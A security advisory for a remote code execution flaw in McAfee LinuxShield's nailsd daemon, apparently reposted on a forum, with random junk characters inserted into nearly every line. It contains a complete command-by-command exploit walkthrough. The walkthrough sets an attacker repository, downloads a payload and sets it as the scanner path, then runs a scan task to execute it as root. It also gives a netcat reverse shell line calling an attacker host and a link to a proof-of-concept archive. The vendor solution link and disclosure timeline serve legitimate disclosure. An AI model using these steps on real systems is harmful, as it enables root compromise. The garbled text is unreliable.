      K- w, G8 C$ X$ lLinuxShield installations can be centrally controlled by ePolicy( ^5 a, F* ]( @# c+ D
    Orchestrator.& l# v8 [. Y/ y7 h8 N" ~7 j

    - l9 ^" y2 M, H- t; `(Product description from LinuxShield Product Guide)/ X. E2 l" c4 m4 o

    " A6 t2 D; P: q* O) a% r
    ( H0 ^) Q8 _4 V5 \; T- e, h  C& A7 C* m( X; j
    Description:
    ( o* o/ P& J- N: p9 M& M6 {============
    1 Q$ V5 K( l/ [/ ]' W4 Q- _, E/ u: ~
    This vulnerability allows remote attackers to execute arbitrary code
    : j! j; l4 F" L. I* T: F$ E! Gon vulnerable installations of McAfee LinuxShield. User interaction
    / d: [5 b4 }: x3 @8 L5 Q/ Z, ^+ w, Sis not required to exploit this vulnerability but an attacker must
    : S2 {+ K5 }6 l; n2 W, g# Sbe authenticated.
    ' n/ v( @. Z$ j" z7 _7 Y
    7 G. Z$ Z5 B0 O; IThe LinuxShield Webinterface communicates with the localy installed  y0 ?. p2 D! p. L* }6 W% C6 U/ ~
    "nailsd" daemon, which listens on port 65443/tcp, to do! ?; X/ e7 ]+ i
    configuration6 j1 E" D$ F& P, }
    changes, query the configuration and execute tasks.
      k" T; `# c3 m$ U9 ]" s) f# q3 T$ P/ Y$ `! {  s9 N3 Q
    Each user, which can login to the victim box, can also authenticate" d2 @7 Z1 W5 a2 E; `. Y
    it self to the "nailsd" and can do configuration changes and. ~0 e) f4 h( u9 X# j- S6 k
    execute
    . y. i- L  a  \/ R) i# q/ T2 Ptasks with root privileges.
    & I0 S3 g3 @3 Z* W6 B8 g, D7 V& _. i  b) A3 s/ N+ J4 e( ~+ Y: s" f
    A direct execution of commands is not possible, but it is possible to& @2 p& s: F. C$ G% K
    download and execute code through manipulation of the config and+ f+ ^1 I( }+ e$ j; h* {
    execute schedule tasks of the LinuxShield.0 u) }. [; c/ }. H( R# w, r: J
    8 c' p. r( o' w+ n

    % R7 w! k) S; E' W$ g* {9 Kwalk-through (after the TLS handshake):
    $ s! l: i2 H# P& c* ~. p+--------------------------------------  E  L. O. N: r/ e5 n

    9 s, ]+ Z( H3 F% J/ `$ ~nailsd > +OK welcome to the NAILS Statistics Service: S+ F4 @. b2 V( q3 {- m7 a
    attacker> auth <user> <pass>
    - ~- c- w& \& ^$ Q0 mnailsd > +OK successful authentication
    1 ]% }3 {3 X1 T
    * W/ l0 [" Z9 P, z) E2 d" o# Set the Attacker repository to download our code from a httpd7 b- }2 E( c3 y- @  T
    # (catalog.z)
    & R& z; ?5 F" {3 _" \9 \#---------------------------------------------------------------
    1 Q+ z+ d3 q6 q8 m* O! U' r8 qattacker> db set 1 _table=repository status=1 siteList=<?xml version
    4 K2 [9 {. a8 b& k; B8 D="1.0" encoding="UTF-8"?><ns:SiteLists
    3 {" z# c$ x! l& M! A8 M7 m, lxmlns:ns="naSiteLi" k6 T$ z) q7 }6 n0 a
    st" GlobalVersion="20030131003110"
    ! Y/ h  G7 X0 |* wLocalVersion="20091209
    0 c6 v) ~  ~& F. z. c161903" Type="Client"><SiteList) }: W* C6 r, i8 Y
    Default="1" Name="SomeGU, T. e, q/ k, o
    ID"><HttpSite Type="repository"8 k8 B7 k! r8 r% I3 ~2 H; o
    Name="EvilRepo" Order="1
    5 i8 T2 U' ?- N; l% P" Server="<attackerhost>:80"
    & _; X+ }% |8 w, ~, j) `, w/ M( ?Enabled="1" Local="1"><Rela
    8 l& j/ A  z: \$ X( l( \5 _, a3 {% ~4 _
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use. [* p' h+ R9 _
    rName></" |/ R4 o, {9 S4 c
    UserName><Password8 v1 H; R1 y7 G0 ~/ u: c6 j+ r
    Encrypted="0"/></HttpSite></SiteList></
    % b( h) A1 X4 N6 w% V* f$ g4 Ens:SiteLists> _cmd=update( V1 H  S& G0 S: w# J
    nailsd > +OK database changes buffered., A" u% j& p* M) h6 l

    / j/ y. Y) `% k) R* c" l# h8 ?# Execute task to set the attacker repository: K/ M. K5 L, X8 l
    #---------------------------------------------------------------7 v3 T3 Q, }, c
    attacker> task setsitelist% _0 K4 ?; o* |* D
    nailsd > +OK setting sitelist from CMA.4 C6 q9 \/ Y4 v6 P7 k0 S8 ?
    % J8 s. q7 O" E: j+ ^, V  T, g7 @
    # Execute the default Update task to download the code
    . w6 v# E8 b" z7 h2 t) u8 ~; `- Y#---------------------------------------------------------------& S) c' e' C% s$ E: P2 R
    attacker> task nstart LinuxShield Update
    0 {5 h# A  {9 Q3 b, Ynailsd > +OK task LinuxShield Update starting
    , H$ O4 g1 e- _8 A5 \; ?4 e' [; g+ ~" [3 W! D
    # Create a Scan profile, which executes our code. The profiles are
    ( f5 u) o6 h& n! B# not stored in the database./ w* F1 v" j$ f6 \# y$ U# R9 M
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg! q" _3 k) _, Z( H5 [
    #---------------------------------------------------------------$ X; p, s0 {' b# o( {4 U* k
    attacker> sconf ODS_99 begin5 h  W1 s* k5 e; `1 A, |9 b
    nailsd > +OK 1260400888
    ) L! r) Q/ R4 d$ x% r" e& d. R4 p# n1 f  }5 D
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the+ x: S+ x! o1 Y3 C7 \, X1 J
    path5 C1 b/ [, W7 j3 Y
    # where our earlier downloaded catalog.z file is stored.( v% E& D+ ]6 n0 v; z0 j
    # (/opt/McAfee/cma/scratch/update/catalog.z)& D7 m2 V4 [8 e" \  ^
    #---------------------------------------------------------------4 l& T. [5 d3 B2 I7 L2 h% A
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=$ n4 J/ s- a4 a
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    # q7 K% h( S; B: a7 rDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    % D9 b- A0 l7 U, B) m6 l. c10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    # f9 I; o: N" k6 K. A" Cine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    $ X: p& G! D: ^file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
      `) v; y+ _: kir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en4 Z- Q6 S0 u$ Y& r/ ^3 v4 o
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    3 ~. O% c% l* q5 C% w5 Z- B.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu% S2 E  ~7 V5 G' Z. b$ y, G
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru7 u, ]3 T1 [4 B+ A& W
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99+ c1 C6 W7 t( Q& s
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi3 v7 E) T; M$ r5 M6 {' f) ~! r) C3 n
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    * I. ^' w! \- ?/ l- U- h; ~dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    . X% s; P% {' E2 c8 xe nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    & l1 ], M' {# \* C5 `* b* }ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    % J1 U# @+ R, C1 \" ~+ n! Po=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    0 g# W: s, m' _  O.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    4 o- T5 S  M5 ?6 N: m# r, r% Crue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat5 s3 H+ O  ?0 g! f
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    4 L" [7 _1 p+ r; d# a% ~% m) i' ~$ I00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.( M# b' c  k7 f2 ]; M
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    8 N: \0 [7 G" s3 |, hter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true1 c$ x0 G. _, c8 o" Q' G& s
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    + y3 _$ Y4 Q: ?8 rofile.ODS_99.filter.extensions.type=extension nailsd.profil- U$ q: e  C1 u" F9 P
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99/ T9 G/ N( i4 o6 C% N- Q$ [, X
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    , y7 y* Y9 L5 ~action.App.primary=Clean nailsd.profile.ODS_99.action.App.s) l, V# r8 x' `0 d2 n4 [
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa# v4 A4 `. d4 i6 e0 `4 b
    ss nailsd.profile.ODS_99.action.error=Block
    ' @( V& m9 Q. _6 ?7 ^5 d1 e3 Wnailsd > +OK configuration changes buffered
    7 t4 z0 A4 J# P. b- M# ]- s/ b, Hattacker> sconf ODS_99 commit 1260400888
    4 L8 R% R4 a2 K1 ynailsd > +OK configuration changes stored9 s+ g1 Z$ {- s3 D6 ?4 C# S. F# u

    ! v: }; u  G' b* C' q& X# Set a scan task with the manipulated profile to execute the code1 i, G5 f( `5 z! Z
    #---------------------------------------------------------------) O6 |3 D1 @. O! g2 c
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    4 t6 _( \, L* P7 a/ X+ upe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    ' d. j& J! S2 q3 {0 S- amp;exclude:false timetable=type=unscheduled taskResults=0 i
    " o* t! G3 u9 L, G2 ^_lastRun=1260318482 status=Stopped _cmd=insert2 G2 k8 w' K' @6 D- l: f# \
    nailsd > +OK database changes buffered* T' y8 w* l) |( Q+ l7 P  D
    * t6 I, |3 y* L. ~8 q5 s
    # Execute scan task to execute the code1 {" p9 S/ D! J1 v: i
    #---------------------------------------------------------------4 }4 y  N$ ~# ?4 g, M( D6 v5 d
    attacker> task nstart Evil Task
    : t6 O0 h8 A4 @* D  g, s
    1 g( G5 U5 |0 d9 U" B2 r+-------------------------------------- walk-through EOF/ l1 P5 |  z; L0 ~3 t4 }6 z

    6 a: K  c5 y' p% ^7 d' D. k! \$ J& M, }
    To get a reverse root shell place something like this in the catalog.z
    " L( {  d& k( _0 r8 T3 R6 d2 `/ ^+ x4 j% x* `( w0 F7 [0 b% ~8 w
    --- snip ---
    $ t) {) Y7 M+ y#!/bin/sh) F! y- b8 q4 P- z, V
    nc -nv <attacker_host> 4444 -e /bin/sh
    : P; ~' \$ a5 j--- /snip ---
    " r& A$ L5 }3 D3 t% P3 v, q- V7 n/ _0 h) R# \# D
    9 B: _* g2 M& i+ p7 G9 e5 _- e

    6 C' `" l% o7 u$ a* CProof of Concept :
    7 R4 @/ F, }7 ]==================
      Y6 O: |9 U6 p+ k- L3 ?9 U" ?. a/ \+ D: {: L% m2 w
    http://inj3ct0r.com/sploits/11165.tar.gz0 M/ a4 @8 b$ D& D" U
    * g9 k7 y: [9 Y8 P3 {2 T

    9 X" x7 F$ `" H' U. j- H1 P  W$ c" q4 H: y- v: ^8 \& G
    Solution:2 v8 E/ u2 b7 o) b
    =========# ]* K9 {9 I* `' _% a2 V  C+ N8 _0 A

    1 ]* ~5 Z. p( {# {McAfee Advisory2 D) t! {4 Z! f9 S4 f$ ^
    +--------------& C$ D) Q8 w2 m7 b  V
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    2 Z& i( U* G1 L8 |9 S' W: C. r5 x; g/ {. \

    + R8 K, P% \" K' a( S) j2 A; T( ]: ^. ]! b; P8 m
    Disclosure Timeline (YYYY/MM/DD):
    ' A" V/ Q& c9 \=================================9 b+ N5 d; Y+ I% w3 A+ P

    / d! x& J! p/ N5 w* O2009.12.07: Vulnerability found, E1 l) M/ Q7 Y2 q4 x
    2010.02.03: Asked vendor for a PGP key3 A( z4 \. H$ l+ Z6 D: U
    2010.02.05: Vendor sent his PGP key, Q2 y; J7 e0 g* ^
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure' Z1 @  F  l3 K, X
    date (2010.02.18) to Vendor$ w4 ]) V0 ]- b3 F/ \4 X
    2010.02.05: Vendor acknowledges the reception of the advisory
    ! a& c0 V7 b7 P/ m. \- i. ^# U2010.02.16: Ask for a status update, because the planned release date is: x8 M% y& f" p+ f
    2010.02.18.; M0 P9 A+ M# D  F
    2010.02.16: Vendor response that, they are currently working on a patch# r# ]5 U" e. `( f$ k2 G5 t
    2010.02.17: Changed release date to 2010.02.25.# L% O. G0 |; }2 M+ Y! N
    2010.02.22: Vendor gives a status update, that they are able to release
    , [  }8 w9 Y) z( }the patch on 2010.02.25.9 \1 \" ~4 \+ ^5 H
    2010.02.24: Ask for a list of affected products and the advisory url.
    2 ]& v4 L5 h7 `# C2010.02.24: Vendor sends the list.6 }/ {( W! U3 M! k) M# f
    2010.03.02: Release of this Advisory/ J, H) M2 h' K: s
    $ x9 u5 r# ?$ i! ?; }. i- S- `$ N

    2 y3 x1 \* W0 ?/ \" c4 T- l& f! i2 X: g+ T2 P! a: b( w
    " t) q. j! J+ l' n4 |

    % \% E8 d$ L' A$ D
      K: r  j0 d: M3 b: D! @
    0 `8 @  l: i+ C6 S+ Q( P6 N% V  v7 [9 T  R( S# B& \7 l3 J4 ^2 G9 O: r
    9 |& @; Y1 {- {

    % J- W# c  i4 t6 R6 g6 ?1 c9 x: R7 M. U" Z* r# |& ^1 L+ D
    2 L: u4 U6 [  C4 C7 `

    " k& U5 D2 A5 }& T/ K
    " a3 r$ b' [$ P
    , A/ D, h! s  `) _$ W7 C
    " Q5 Y7 x. j0 a$ P. V7 w+ M! h' x7 x9 J2 a" Z1 ^+ Z

    7 x9 _3 R% w# I; D) U% Q( f: }. Y- B4 ?
    , b+ u0 _8 D" Z- }

    # X) Y7 C" [  u) N) i1 A公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表